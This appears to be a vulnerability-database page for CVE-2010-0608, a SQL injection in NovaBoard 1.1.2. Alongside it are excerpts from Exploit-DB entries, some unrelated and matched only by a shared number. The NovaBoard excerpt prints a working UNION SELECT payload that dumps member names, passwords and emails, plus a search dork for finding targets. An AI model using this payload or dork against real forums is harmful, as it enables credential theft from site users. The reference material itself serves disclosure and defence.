CVE-2010-0608
published 2010-02-11CVE-2010-0608: SQL injection vulnerability in index.php in NovaBoard 1.1.2 allows remote attackers to execute arbitrary SQL commands via the forums[] parameter in a search…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in index.php in NovaBoard 1.1.2 allows remote attackers to execute arbitrary SQL commands via the forums[] parameter in a search action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| novaboard | novaboard | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2004-0608 Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)
---
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Unreal Tournament 2004 "secure" Overflow (Linux)',
'Description' => %q{
This is an exploit for the GameSpy secure query in
the Unreal Engine.
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
The RunServe
Exploit-DB
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2004-0608 Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)
---
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Unreal Tournament 2004 "secure" Overflow (Win32)',
'Description' => %q{
This is an exploit for the GameSpy secure query in
the Unreal Engine.
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
The Run
Exploit-DB
HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow
exploitdb·2010-08-03·CVSS 9.3
CVE-2010-2709 [CRITICAL] HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow
HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow
---
HP OPENVIEW NNM OVJAVALOCALE BUFFER OVERFLOW VULNERABILITY
1. ADVISORY INFORMATION
Title: HP OpenView NNM OvJavaLocale Buffer Overflow Vulnerability
Advisory Id: CORE-2010-0608
Advisory URL: http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow
Date published: 2010-08-03
Date of last update: 2010-08-03
Vendors contacted: HP
Release mode: Coordinated release
2. VULNERABILITY INFORMATION
Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2010-2709
Bugtraq ID: N/A
3. VULNERABILITY DESCRIPTION
There is a buffer overflow vulnerability in the webappmon.exe CGI application included with HP OpenView NNM[1]. This bug can be
Exploit-DB
Novaboard 1.1.2 - SQL Injection
exploitdb·2010-01-28
CVE-2010-0608 Novaboard 1.1.2 - SQL Injection
Novaboard 1.1.2 - SQL Injection
---
#############################################################
# NovaBoard v1.1.2 SQL Injection Vulnerability
# Plugin Home: http://www.novaboard.net/
# Author: Delibey
# Site: www.1923turk.com
##############################################################
# Download Script : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip
# Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=[SQL-inj]
# 1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
# Dork : "Powered by NovaBoard v1.1.2"
# Demo: http://server/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_membe
No writeups or analysis indexed.
http://packetstormsecurity.org/1001-exploits/novaboard112-sql.txthttp://secunia.com/advisories/38368http://www.exploit-db.com/exploits/11278http://www.osvdb.org/62002http://www.securityfocus.com/bid/37988http://packetstormsecurity.org/1001-exploits/novaboard112-sql.txthttp://secunia.com/advisories/38368http://www.exploit-db.com/exploits/11278http://www.osvdb.org/62002http://www.securityfocus.com/bid/37988
2010-02-11
Published